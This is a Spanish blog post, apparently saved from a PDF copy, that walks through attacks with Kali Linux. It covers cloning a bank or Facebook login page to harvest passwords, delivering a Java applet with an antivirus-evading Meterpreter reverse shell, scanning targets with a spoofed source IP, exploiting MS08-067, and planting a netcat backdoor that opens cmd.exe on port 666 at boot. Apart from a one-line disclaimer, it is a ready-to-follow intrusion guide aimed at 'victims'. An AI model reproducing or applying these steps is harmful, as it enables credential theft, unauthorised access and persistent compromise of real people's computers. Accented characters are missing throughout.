Está en la página 1de 6

19/6/2016

Ataques bsicos con Kali Linux | ravmn

SIN ESFUERZO PERO CON CALIDAD

Ataques bsicos con Kali Linux


13 F EB RERO, 2016 ( HTTP ://WWW.RAV MN.CL /CONTENT/ATAQU ES-B ASICOS-CON-K AL I-L INU X ) B Y RAV MN
( HTTP ://WWW.RAV MN.CL /CONTENT/AU THOR/RAV MN) 0 COMENTARIOS
( HTTP ://WWW.RAV MN.CL /CONTENT/ATAQU ES-B ASICOS-CON-K AL I-L INU X # RESP OND)

En esta ocasin compartiremos tres procedimientos a realizar con herramientas


incluidas en Kali Linux. Primero vamos a copiar un sitio web para que el usuario nos
escriba su contrasea. A continuacin, Es importante realices estas actividades
nicamente en redes en las que te encuentres autorizado a realizarlas, ya que su uso
es sancionado. Esta publicacin es nicamente para fines educativos y demostrativos,
no nos responsabilizamos por el uso que le des.

Phishing e ingeniera social


Los mtodos ms sencillos para ganar acceso al computador de la vctima implican la
entrega de datos dirctamente por parte de esta o la suplantacin de identidad
(phishing) mediante correos o sitios web que se camuflan como pertenecientes a una
institucin de confianza (por ejemplo, un banco).

Lo primero que practicaremos ser la clonacin de un sitio web para


que el usuario nos entregue su contrasea. Para ello:
1. Abrimos SET
2. Elegimos 1 y apretamos enter (Social-Engineering Attacks)
3. Ahora seleccionamos la 2 (Website Attack Vectors)
4. Cargamos la nmero 3 (Credential Harvester Attack Method)
5. Le sigue 2 (Site Cloner) y ponemos nuestra ip (Ej: 192.168.161.130)
6. Ingresamos la direccin a copiar (Ej: http://facebook.com o la de un banco)
7. Apretamos {return}

http://www.ravmn.cl/content/ataques-basicos-con-kali-linux

1/6

19/6/2016

Ataques bsicos con Kali Linux | ravmn

En este momento tendremos un pgina igual al de la pgina que elegimos si es que


alguien accede a nuestra ip desde un navegador web. La ingeniera social consiste en
persuadir a la persona de ingresar a la pgina para que, en esta, ingrese sus datos
personales. Al momento de ingresar sus datos ser dirigido al sitio real y pensar que
ingres mal la contrasea usualmente sin sospechar.
A nosotros, en pantalla nos aparecern las siguientes cadenas de texto: POSSIBLE
USERNAME FIELD FOUND: email=CUENTA y POSSIBLE PASSWORD FIELD FOUND:
pass=PASS (donde CUENTA y PASS irn los datos ingresados por el usuario).

A continuacin, a travs de un proceso similar, crearemos una pgina


que solicitar descargar un archivo para funcionar correctamente. Este
archivo nos dar acceso temporal al sistema. Para ello:
1. Abrimos SET
2. Seleccionamos el nmero 1, (Social Engineering Attacks)
3. A continuacin, el 2 (Website Attack Vectors)
4. Luego 1 (Java Applet Attack Method). Esto crear una aplicacin Java para
controlar la mquina.
5. Ahora elegimos 1 (Web Templates) para crear una pgina genrica, o la opcin
2 (Site Cloner) le permite a SET usar una web existente como plantilla.
6. Ahora habremos de elegir 1 (Java Required)
7. Elegimos un payload a enviar, usualmente se elite el 2 (Windows Reverse_TCP
Meterpreter), pero se puede elegir el que se desee (tienen diferente efectividad).
Por ejemplo, el nmero 13, ShellCodeExec Alphanum Shellcode difiere de
otros porque corre desde la memoria, siendo efectivo contra la mayora de los
programas antivirus.
8. Ahora debemos decidir un tipo de codificacin para evitar programas antivirus.
Shikata_ga_nai es muy popular, Multi-Encoder usa mltiples codificadores,
pero el mejor es el 16 (Backdoored Executable). ste ltimo agrega el programa
de puerta trasera a un programa legtimo como Calc.exe.
9. Elige el puerto al cual escuchar (el predeterminado es suficiente). Ahora Kali
Linux lo configura todo. Crea el programa, lo codifica y lo empaqueta. Al terminar
vers una pantalla como esta:
10. Ya estamos listos. Ahora, si una vctima ingresa a la IP de nuestro computador,
se le solicitar correr una aplicacin Java para ver el sitio correctamente. Si la
corre, tendremos una sesin remota a ese computador desde Backtrack:

http://www.ravmn.cl/content/ataques-basicos-con-kali-linux

2/6

19/6/2016

Ataques bsicos con Kali Linux | ravmn

(http://i2.wp.com/cyberarms.files.wordpress.com/2011/12/backtrack5set4.png)
11. Ahora que tenemos una puerta de acceso al PC, usemos Sessions -i y el
nmero de sesin para conectarnos. Una vez conectados podemos usar
comandos de Linux para navegar remotamente el PC, o correr shell para tener
una lnea de comandos de Windows remota.

(http://i1.wp.com/cyberarms.files.wordpress.com/2011/12/backtrack5set5.png)
Eso es todo. El usuario puede cerrar el navegador y continuaremos conectados, porque
una vez que la shell se conecta, no se requiere ms de la pgina web. La mayora de
los atacantes solidificarn su conexin con el PC y unirn la sesin a otro proceso
para hacer desaparecer el shell.

Metasploit y ataque en red:


Este mtodo, a diferencia del anterior, no requiere que el usuario cargue una pgina.
Nosotros nos meteremos a su computador por la fuerza.
Para preparar Kali Linux para el proceso debemos correr dos comandos (activar los
procesos apache y ssh):
/etc/init.d/apache2 start
/etc/init.d/ssh start
sshd generate

Ahora empezaremos por reconocer a quien atacaremos.

http://www.ravmn.cl/content/ataques-basicos-con-kali-linux

3/6

19/6/2016

Ataques bsicos con Kali Linux | ravmn

Ahora empezaremos por reconocer a quien atacaremos.


Para saber ms informacin de la vctima, habremos de correr nmap, herramienta
que escanea puertos abiertos y permite conocer servicios en ejecucin y el sistema
operativo del objetivo. Para ello, usaremos el comando
nmap -e eth0 -PN -S IPNUESTRA -sV -O IPVICTIMA (Reemplazar IPNUESTRA con
una IP falsa para encubrirnos e IP VICTIMA por la IP del objetivo).
Otra herramienta que puede sernos de utilidad es Lanmap, ya que nos genera una
imagen de como vendra a estar armada la red (Nos crea un mapa con los routers y
computadores existentes). Se utiliza mediante
lanmap -v -i eth0 -r 30 -T png -o /root/ (La imagen ser guardada en /root)

Explotando vulnerabilidades:
Ahora, usando de base lo recolectado, podemos pasar a armar el ataque con
metasploit. Esta herramienta permite explotar una grandsima cantidad de fallos
conocidos en los sistemas para darnos acceso remoto a la mquina.
Como ejemplo, para explotar una vulnerabilidad en el puerto 445 debemos seleccionar
lo siguiente en metasplot (se debe cambiar IPVICTIMA e IPNUESTRA por los valores
que correspondan):
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST IPVICTIMA
set LHOST IPNUESTRA
exploit (inicia el ataque y debiera darnos acceso a una lnea de comandos de
Windows)

Afianzando la conexin
El ataque anterior dura hasta que la vctima o el atacante se desconecte. Para permitir
acceso futuros se han de habilitar puertas traseras. Para esto se usa la herramienta
netcat.
Primero enviaremos netcat al computador vctima con:
upload /root/nc.exe C:\\Windows\\System32\\
Luego registraremos netcat para que inicie con Windows y nos habilite el puerto 666
para permitirnos entrar cuando querramos:
http://www.ravmn.cl/content/ataques-basicos-con-kali-linux

4/6

19/6/2016

Ataques bsicos con Kali Linux | ravmn

reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v


Lab
Backtrack -d C:\Windows\System32\nc.exe -L -d -p 666 -e cmd.exe
Ahora podemos reiniciar con reboot y debiramos podernos conectar mediante
netcat o metasploit directamente a la puerta trasera (puerto 666 en este caso).

Anterior

Desbloqueo de Nintendo Wii (http://www.ravmn.cl/content/desbloqueo-denintendo-wii)

DEJA UN COMENTARIO
Tu direccin de correo electrnico no ser publicada. Los campos obligatorios estn
marcados con *

Nombre *

Correo electrnico *

Web

Publicar comentario

Con la tecnologa de WordPress (http://wordpress.org/). Tema: Flat 1.7.6 por Themeisle


http://www.ravmn.cl/content/ataques-basicos-con-kali-linux

5/6

19/6/2016

Ataques bsicos con Kali Linux | ravmn

(https://themeisle.com/themes/flat/).

http://www.ravmn.cl/content/ataques-basicos-con-kali-linux

6/6